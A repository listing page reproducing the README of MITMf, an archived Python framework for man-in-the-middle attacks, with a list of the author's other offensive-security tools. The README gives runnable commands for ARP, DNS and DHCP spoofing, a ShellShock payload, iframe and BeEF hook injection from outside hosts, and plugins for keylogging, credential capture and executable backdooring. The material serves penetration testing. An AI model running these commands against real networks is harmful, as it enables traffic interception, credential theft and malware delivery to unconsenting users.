byt3bl33d3r/MITMf byt3bl33d3r/MITMf

  • This repository has been archived on 29/Aug/2018
  • Stars
    star
    3,472
  • Rank 12,485 (Top 0.3 %)
  • Language
    Python
  • License
    GNU General Publi...
  • Created almost 10 years ago
  • Updated almost 6 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
byt3bl33d3r/MITMf
github

byt3bl33d3r

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Framework for Man-In-The-Middle attacks

Supported Python versions Latest Version Supported OS Code Climate Build Status Coverage Status

MITMf

Framework for Man-In-The-Middle attacks

This project is no longer being updated. MITMf was written to address the need, at the time, of a modern tool for performing Man-In-The-Middle attacks. Since then many other tools have been created to fill this space, you should probably be using Bettercap as it is far more feature complete and better maintained.

Quick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io

This tool is based on sergio-proxy and is an attempt to revive and update the project.

Contact me at:

Before submitting issues, please read the relevant section in the wiki .

Installation

Please refer to the wiki for installation instructions

Description

MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.

Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it's been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.

Features

  • The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.

  • As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.

  • The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.

  • MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using Net-Creds, which is run on startup.

  • Responder integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.

Active packet filtering/modification

You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)

For example, here's a stupid little filter that just changes the destination IP address of ICMP packets:

if packet.haslayer(ICMP):
	log.info('Got an ICMP packet!')
	packet.dst = '192.168.1.0'
  • Use the packet variable to access the packet in a Scapy compatible format
  • Use the data variable to access the raw packet data

Now to use the filter all we need to do is: python mitmf.py -F ~/filter.py

You will probably want to combine that with the Spoof plugin to actually intercept packets from someone else ;)

Note: you can modify filters on-the-fly without restarting MITMf!

Examples

The most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0:

python mitmf.py -i enp3s0

ARP poison the whole subnet with the gateway at 192.168.1.1 using the Spoof plugin:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1

Same as above + a WPAD rogue proxy server using the Responder plugin:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad

ARP poison 192.168.1.16-45 and 192.168.0.1/24 with the gateway at 192.168.1.1:

python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1

Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):

python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1

Enable LLMNR/NBTNS/MDNS spoofing:

python mitmf.py -i enp3s0 --responder --wredir --nbtns

Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):

python mitmf.py -i enp3s0 --spoof --dhcp

Same as above with a ShellShock payload that will be executed if any client is vulnerable:

python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'

Inject an HTML IFrame using the Inject plugin:

python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com

Inject a JS script:

python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js

Start a captive portal that redirects everything to http://SERVER/PATH:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH

Start captive portal at http://your-ip/portal.html using default page /portal.html (thx responder) and /CaptiveClient.exe (not included) from the config/captive folder:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive

Same as above but with hostname captive.portal instead of IP (requires captive.portal to resolve to your IP, e.g. via DNS spoof):

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns

Serve a captive portal with an additional SimpleHTTPServer instance serving the LOCALDIR at http://IP:8080 (change port in mitmf.config):

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR

Same as above but with hostname:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns

And much much more!

Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)

For a complete list of available options, just run python mitmf.py --help

Currently available plugins

  • HTA Drive-By : Injects a fake update notification and prompts clients to download an HTA application
  • SMBTrap : Exploits the 'SMB Trap' vulnerability on connected clients
  • ScreenShotter : Uses HTML5 Canvas to render an accurate screenshot of a clients browser
  • Responder : LLMNR, NBT-NS, WPAD and MDNS poisoner
  • SSLstrip+ : Partially bypass HSTS
  • Spoof : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
  • BeEFAutorun : Autoruns BeEF modules based on a client's OS or browser type
  • AppCachePoison : Performs HTML5 App-Cache poisoning attacks
  • Ferret-NG : Transparently hijacks client sessions
  • BrowserProfiler : Attempts to enumerate all browser plugins of connected clients
  • FilePwn : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
  • Inject : Inject arbitrary content into HTML content
  • BrowserSniper : Performs drive-by attacks on clients with out-of-date browser plugins
  • JSkeylogger : Injects a Javascript keylogger into a client's webpages
  • Replace : Replace arbitrary content in HTML content
  • SMBAuth : Evoke SMB challenge-response authentication attempts
  • Upsidedownternet : Flips images 180 degrees
  • Captive : Creates a captive portal, redirecting HTTP requests using 302

How to fund my tea & sushi reserve

BTC: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU

ETH: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee

LTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr

More Repositories

1

CrackMapExec

A swiss army knife for pentesting networks
Python
7,779
star
2

OffensiveNim

My experiments in weaponizing Nim (https://nim-lang.org/)
Nim
2,438
star
3

SILENTTRINITY

An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR
Boo
2,054
star
4

DeathStar

Uses Empire's (https://github.com/BC-SECURITY/Empire) RESTful API to automate gaining Domain and/or Enterprise Admin rights in Active Directory environments using some of the most common offensive TTPs.
Python
1,520
star
5

SprayingToolkit

Scripts to make password spraying attacks against Lync/S4B, OWA & O365 a lot quicker, less painful and more efficient
Python
1,334
star
6

gcat

A PoC backdoor that uses Gmail as a C&C server
Python
1,302
star
7

ItWasAllADream

A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE
Python
725
star
8

WitnessMe

Web Inventory tool, takes screenshots of webpages using Pyppeteer (headless Chrome/Chromium) and provides some extra bells & whistles to make life easier.
Python
683
star
9

pth-toolkit

Modified version of the passing-the-hash tool collection made to work straight out of the box
Python
508
star
10

OffensiveDLR

Toolbox containing research notes & PoC code for weaponizing .NET's DLR
PowerShell
492
star
11

SpamChannel

Spoof emails from any of the +2 Million domains using MailChannels (DEFCON 31 Talk)
JavaScript
309
star
12

chrome-decrypter

Python script to decrypt saved Chrome usernames and passwords on windows
Python
265
star
13

arpspoof

Python clone of arpspoof that can poison hosts via arp-requests as well as arp-replies
Python
184
star
14

sslstrip2

A mirror of the original SSLstrip+ code by Leonardo Nve
Python
175
star
15

AnsiblePlaybooks

A collection of Ansible Playbooks that configure Kali to use Fish & install a number of tools
156
star
16

NimDllSideload

DLL sideloading/proxying with Nim!
Nim
144
star
17

duckhunter

Converts a USB Rubber ducky script into a Kali Nethunter friendly format for the HID attack
Python
117
star
18

Slides

Slides from various talks that I've given over the years
116
star
19

DHCPShock

Spoofs a DHCP server and exploits all clients vulnerable to the 'ShellShock' bug
Python
83
star
20

BOF-Nim

Cobalt Strike BOF Files with Nim!
Nim
79
star
21

BeEF-API

Python library that facilitates interfacing with BeEF via it's RESTful API
Python
76
star
22

webview_d3

Generate graphs with NetworkX, natively visualize with D3.js and pywebview
Python
69
star
23

Naga

A C# stager for SILENTTRINITY (https://github.com/byt3bl33d3r/SILENTTRINITY)
C#
62
star
24

Invoke-AutoIt

Loads the AutoIt DLL and PowerShell assemblies into memory and executes the specified keystrokes
PowerShell
59
star
25

wifi-graper

Automatically get internetz from access points that have MAC based filtering enabled
Python
53
star
26

toby

Recursively searches a directory for any file containing a specified string
Python
44
star
27

CME-PowerShell-Scripts

A collection of modifed PowerShell Scripts for CrackMapExec (https://github.com/byt3bl33d3r/CrackMapExec)
PowerShell
43
star
28

MemeGenerator

Modern problems require modern solutions
Python
31
star
29

pythoncookie

My Python Cookiecutter project template
Dockerfile
30
star
30

tailscalesd

Prometheus Service Discovery for Tailscale (Python Edition)
Python
23
star
31

SponsorMonitor

Monitor Github Sponsors and automatically add/remove them to/from a Github Organization Team.
Python
23
star
32

Kaliya

A cross-platform stager for SILENTTRINITY (https://github.com/byt3bl33d3r/SILENTTRINITY)
C#
23
star
33

cmd2powershell

Converts a command to a base64 powershell compatible string
Python
22
star
34

Utinni

An async Python client library for Empire's RESTful API
Python
21
star
35

MITMf-opt-plugins

Optional plugins for MITMf
Python
14
star
36

hookme

Automatically exported from code.google.com/p/hookme
C#
13
star
37

jamaal-re-tools

Automatically exported from code.google.com/p/jamaal-re-tools
HTML
12
star
38

byt3bl33d3r.github.io

Trying to take the dum-dum out of security
HTML
10
star
39

BOF-Zig

Cobalt Strike BOF with Zig!
C
9
star
40

byt3bl33d3r

Github Profile Readme
8
star
41

LocoCrack

A loco version of BozoCrack with some improvements (https://github.com/juuso/BozoCrack)
Python
8
star
42

sergio-proxy

Original Sergio-Proxy code written by Ben Schmidt (@_supernothing)
Python
7
star
43

externalip

Prometheus client that exposes your external IP address
Python
6
star
44

conky-gr33n

Conky config for everyone who likes a lot of green
Lua
4
star
45

conky-r3d

Conky config for everyone who likes a lot of red
Lua
2
star
46

playwright-heap-snapshot

API and CLI tool to fetch and query Chome DevTools heap snapshots (Python & Playwright)
Python
2
star